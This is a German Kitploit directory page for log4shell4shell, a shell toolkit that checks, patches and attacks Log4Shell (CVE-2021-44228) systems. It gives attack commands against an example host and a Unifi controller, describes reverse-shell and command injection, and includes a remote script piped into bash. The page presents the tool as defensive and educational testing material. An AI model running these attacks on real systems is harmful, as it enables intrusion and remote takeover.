Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4shell4shell — Log4shell - Multi-Toolkit. Finde, behebe und teste mögliche CVE-2021-44228 Schwachstellen - bietet eine vollständige LOG4SHELL-Test-/Angriffsumgebung in der Shell | Kitploit
Tools/GitHubGitHub/suuhm/log4shell4shell
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - Multi-Toolkit. Finde, behebe und teste mögliche CVE-2021-44228 Schwachstellen - bietet eine vollständige LOG4SHELL-Test-/Angriffsumgebung in der Shell

Repository anzeigen
5vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

log4shell4shell

Log4j - Multitool. Finden und Beheben möglicher CVE-2021-44228-Schwachstellen - bietet eine vollständige LOG4SHELL-Test-/Angriffsumgebung

Thumb

Funktionen

  • Überprüfen Sie Ihr Linux/Mac/BSD- und Windows-System auf CVE-2021-44228-Schwachstellen
  • Beheben Sie Ihr System, indem Sie die log4j-Java-Klasse löschen oder einige Umgebungsvariablen setzen
  • Proof of Concept: Sie können einen Dummy-Spring-Boot-Server ausführen, um den Exploit selbst zu testen (https://github.com/christophetd/log4shell-vulnerable-app)
  • Sie können einen Angriff gegen eine gewünschte IP-Port durchführen und einen Base64-Befehl oder eine einfache Reverse Shell einfügen
  • Vollständiges IP-Bereichs-Scanning durch https://github.com/fullhunt/log4j-scan

So führen Sie es unter Linux/Mac/BSD aus:

Voraussetzungen:

  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

Schneller Systemcheck mit diesem Einzeiler:

root@kitploit:~
wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

Weitere Optionen

Führen Sie einen Beispielangriff gegen IP: 10.4.4.20 Port 8080 Loginseite und zusätzlich eine Reverse-Proxy-Shell aus:

root@kitploit:~
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

Führen Sie screen -r l4s4s-ldap-srv und/oder screen -r l4s4s-nc-rsh aus, um einige Angriffsinformationen in der Exploit-Server-Shell anzuzeigen:

Führen Sie einen vollständigen Scan IP: 10.4.4.20 Port 8080 und zusätzlich einen Test aller Tests durch:

root@kitploit:~
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

Führen Sie einen Proof of Concept auf einem Tomcat-Springboot-Server aus:

root@kitploit:~
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

Führen Sie einen Unifi-Controller-Exploit-Angriff/-Check (auf 10.4.4.20:8443) durch:

root@kitploit:~
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

Alle verfügbaren Optionen

root@kitploit:~
_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm

Falsche Eingabe! Bitte geben Sie eine dieser Optionen ein:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

So aktualisieren Sie Ihre Linux- und/oder macOS-Python-Version:

Führen Sie einfach mein Hilfsskript aus (--list-versions): ./python-upgrader.sh

So führen Sie es unter Windows x86 / x64 aus:

Führen Sie es einfach in Powershell (Admin-Modus) aus: .\set_windows_fix.ps1

Dieses Skript ist Alpha! Bitte lassen Sie mich wissen, wenn Sie Probleme haben

Rechtlicher Haftungsausschluss

Das Projekt log4shell4shell wurde nur für Bildungs- und ethische Testzwecke entwickelt. Die Verwendung von log4j-scan zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.

Tool herunterladen